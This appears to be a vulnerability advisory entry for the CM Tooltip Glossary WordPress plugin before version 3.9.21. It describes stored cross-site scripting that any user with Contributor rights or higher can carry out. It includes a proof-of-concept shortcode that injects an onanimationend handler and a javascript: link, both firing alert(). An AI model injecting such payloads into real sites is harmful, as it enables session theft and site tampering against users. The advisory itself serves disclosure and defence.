Lucene search

K
wpvulndbApple502jWPVDB-ID:B83880F7-8614-4409-9305-D059B5DF15DD
HistorySep 06, 2021 - 12:00 a.m.

CM Tooltip Glossary < 3.9.21 - Contributor+ Stored Cross-Site Scripting

2021-09-0600:00:00
apple502j
wpscan.com
11

0.001 Low

EPSS

Percentile

24.8%

The plugin does not escape some glossary_tooltip shortcode attributes, which could allow users a role as low as Contributor to perform Stored Cross-Site Scripting attacks

PoC

[glossary_tooltip dashicon=‘" style=“animation-name:twentytwentyone-close-button-transition” onanimationend="alert(/XSS-enhanced-tooltipglossary_dashicon/)//’ link=“javascript:alert(/XSS-enhanced-tooltipglossary_link/)”]Click me[/glossary_tooltip]

CPENameOperatorVersion
enhanced-tooltipglossarylt3.9.21

0.001 Low

EPSS

Percentile

24.8%

Related for WPVDB-ID:B83880F7-8614-4409-9305-D059B5DF15DD